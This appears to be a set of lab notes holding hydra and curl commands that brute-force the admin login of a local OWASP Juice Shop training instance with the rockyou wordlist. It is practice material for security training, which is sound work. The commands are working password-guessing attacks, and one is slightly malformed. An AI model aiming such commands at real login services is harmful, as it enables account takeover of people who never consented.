hydra -s 3000 -vV -l 'admin@juice-sh.op' -P /usr/share/wordlists/rockyou.txt \
  -H "Content-Type: application/json" \
  localhost http-post-form '/rest/user/login:{"email":"^USER^","password":"^PASS^"}:Invalid email or password'


hydra -s 3000 -vV -l 'admin@juice-sh.op' -P /usr/share/wordlists/rockyou.txt \
  -H "Content-Type: application/x-www-form-urlencoded" \
  localhost http-post-form '/rest/user/login:email=^USER^&password=^PASS^:Invalid email or password'


curl -s -X POST http://localhost:3000/rest/user/login \
  -H 'Content-Type: application/json' \
  -d '{"email":"nope@example.com","password":"bad"}' | sed -n '1,200p'


http://localhost:3000/#/login


hydra -l admin@juice-sh.op -P /usr/share/wordlists/rockyou.txt \
http-post-form "http://localhost:3000/rest/user/login:\
{\"email\":\"^USER^\",\"password\":\"^PASS^\"}:Invalid email or password." -t 4
